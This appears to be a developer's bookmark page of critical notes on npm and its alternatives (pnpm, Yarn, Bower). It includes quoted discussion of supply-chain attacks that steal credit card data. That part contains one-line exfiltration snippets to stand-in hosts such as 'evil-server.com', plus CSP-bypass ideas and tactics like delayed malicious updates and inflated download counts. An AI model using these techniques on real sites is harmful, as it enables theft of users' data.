dandv + npm + against   12

pnpm does module hard/sym linking better than Yarn
See my comment too: Parcel works with pnpm, yarn didn't.

Only downside is that eslint needs eslint-import-resolver-node:

See also https://iamturns.com/yarn-vs-npm-2018/#comment-4255639506
pnpm against yarn npm
december 2018 by dandv
2016: I've Just Liberated My Modules | Hacker News
Unclear how this was solved.

[[The fact that this is possible with NPM seems really dangerous. The author unpublished (erm, "liberated") over 250 NPM modules, making those global names (e.g. "map", "alert", "iframe", "subscription", etc) available for anyone to register and replace with any code they wish.

Since these libs are now baked into various package.json configuration files (some with tens of thousands of installs per month, "left-pad" with 2.5M/month), a malicious actor could publish a new patch version bump (for every major and minor version combination) of these libs and ship whatever they want to future npm builds. Because most package.json configs use the "^1.0.1" caret convention (and npm --save defaults to this mode), the vast majority of future installs could grab the malicious version.

This is extremely severe. Any package I install might, after x levels of sub-dependencies, pull in one of these names which are potentially pwned. React and Babel pulled in a few of them, to take some well-known examples.

I would say the whole npm is pwned until these packages are either restored or that the package name is blacklisted/reserved.]]
security exploit against npm kik
september 2018 by dandv
I’m harvesting credit card numbers and passwords from your site. Here’s how.
Extremely legit concern.


* npm package compromises did happen, e.g.
* https://github.com/conventional-changelog/conventional-changelog/issues/282#issuecomment-365367804
* https://www.bleepingcomputer.com/news/security/somebody-tried-to-hide-a-backdoor-in-a-popular-javascript-npm-package/
* https://www.theregister.co.uk/2017/08/02/chrome_web_developer_extension_hacked/

* Any way to prevent outgoing connections through
`window.open('https://legit-analytics.com?q=${payload}', '_blank').close()` with CSP?
A: Wow, didn’t think of that and no, I don’t know if CSP can prevent that.

* "Not just NPM… Think of Joomla extensions or WordPress plugins. A nice way to compromise millions of “traditional” PHP based websites"

* "It isn’t that far from the truth. Something similar is happening already: https://blog.sucuri.net/2017/10/credit-card-stealer-investigation-uncovers-malware-ring.html"

* "Typosquatting attacks apply to any software dependency not just open source and not just npm. Malicious submissions happen in the walled garden Apple App Store and Google Play stores, but since they hold moderation capability centrally and have a large volume of paid staffers, they can do something about it faster than volunteers typically do. A fake WhatsApp app on Google Play store was downloaded by more than 1 million people before it was taken down.

This is definitely a conversation we need to have.

Surprised there was no mention of delayed attacks (e.g., gain trust, gain users, then inject malicious changes in a future version).

Another variation on this would be to approach maintainers (say 10k+ download Firefox or Chrome extension authors, or WordPress authors) and offer them a “custom” advertising program if they just install your code you pay them… maybe your ads seem easy or exceptionally non-intrusive, but that’s because the ads are not the true goal."

* "This is scary and let’s not forget the server side.
Node.js is becoming popular on the server side and backend developers are also using a lot of NPM dependencies without vetting them thoroughly.
For example an Express middleware module should be able to gather the same data and forward it wherever (…and there are a lot of Express middleware modules in the NPM repository).

Although there are perhaps more possibilities on the server side to prevent malicious code from communicating back (for example using network limitations) — I wouldn’t be surprised if most front facing Node.js servers had little limitations to what Internet hosts they could communicate with."

* "you could use webrtc datachannels for sending out data.. it is not affected by CSP at all .. yet.."


* "At the end of the day, if you can do document.location = https://evil-server.com/bounce?q=data (e.g. in a form submit event) and bounce back to the original site quickly enough, you can get data out."

* "If the CSP doesn’t define a style-src you could use insertRule to add some css.
e.g. `something::after { content:url("evilserver.com/userdatastring") }`"

* "Yeah, Google Tag Manager scripts are super-dangerous, it’s so easy for someone to push a nasty script targeted at your site one day, then remove it the next."

* Chrome extensions with "Access data on all sites you visit" can easily swap crypto addresses on exchange sites with their own.

* "About npm, I’d add that an easy way to increase the level of trust of a package is to release many ‘patch’ versions per day. This artificially increases the number of downloads, because of the tons of services spending their time to spot package updates (CI tools, stats services and others)."
JavaScript code injection attack hack security against npm open-source cool
july 2018 by dandv
Yarn: A new package manager for JavaScript | Engineering Blog | Facebook Code
The npm client installs dependencies into the node_modules directory non-deterministically. This means that based on the order dependencies are installed, the structure of a node_modules directory could be different from one person to another. These differences can cause “works on my machine” bugs that take a long time to hunt down.

On some Facebook projects, Yarn reduced the install process by an order of magnitude, from several minutes to just seconds. Yarn also uses a mutex to ensure that multiple running CLI instances don't collide and pollute each other.
yarn against npm alternative Node.js
october 2016 by dandv
Small modules: it’s not quite that simple — Medium
[[Why npm is the most popular package manager

[because] we in the JavaScript world have a higher tolerance for nonsense and dreck. npm makes it ridiculously easy for people to release their half-baked experiments into the wild. The only barrier to entry is the difficulty of finding an unused package name. I’m all in favour of enabling creators, but npm lowers the barriers right to the floor, with predictable results. Bear this in mind when encountering npm stats

But the one problem you simply can’t solve as long as the ‘small modules’ philosophy dominates is that no matter how good the discovery tools are, you can’t discover answers to questions you can’t yet formulate. api.jquery.com and lodash.com/docs and d3/wiki are more than just references; they give you ideas about how to conceptualise problems, and the vocabulary to communicate them to other developers. We need more libraries like those, that tackle an entire domain rather than a microscopic problem.

You can go a long way as a developer with the jQuery Swiss Army knife in your pocket.]]
against npm small modules
august 2016 by dandv
Why use Bower when there is npm? - Quora
"There is simply no benefit for a front-end developer to use Bower over npm." -- Mattias Petter Johansson, JavaScript developer at Spotify
npm against bower
june 2015 by dandv
Why my team uses npm instead of bower — Medium
Unusual environment - "My team builds an SDK for creating and deploying web apps".

"npm is not designed with tools that build other projects in mind"
npm against bower
march 2015 by dandv
Why I Hate NPM - Jongleberry
Great list of reasons why npmjs sucks
against npm Node.js
march 2014 by dandv
Node.JS npm modules for CSV handling
Fucking npmjs.org doesn't have a rating system, so you have to weed out all the crap before getting to useful, tested modules.

* https://npmjs.org/package/csv - most downloads & contributors. Can't read in chunks - https://github.com/wdavidw/node-csv-parser/issues/102

* https://npmjs.org/package/fast-csv - claims to be faster by not caring about corner cases like newlines in values. Fuck it - doesn't run in certain contexts - https://github.com/C2FO/fast-csv/issues/9

* https://npmjs.org/package/csv-string - explicit support for newlines in values (and even in the column names)

* https://npmjs.org/package/csv2json
* https://npmjs.org/package/csv2json-stream
* https://npmjs.org/package/csv-streamify

* https://npmjs.org/package/csvdb - read-only document store (parse a CSV from a URL)
Node.js CSV module npm against
april 2013 by dandv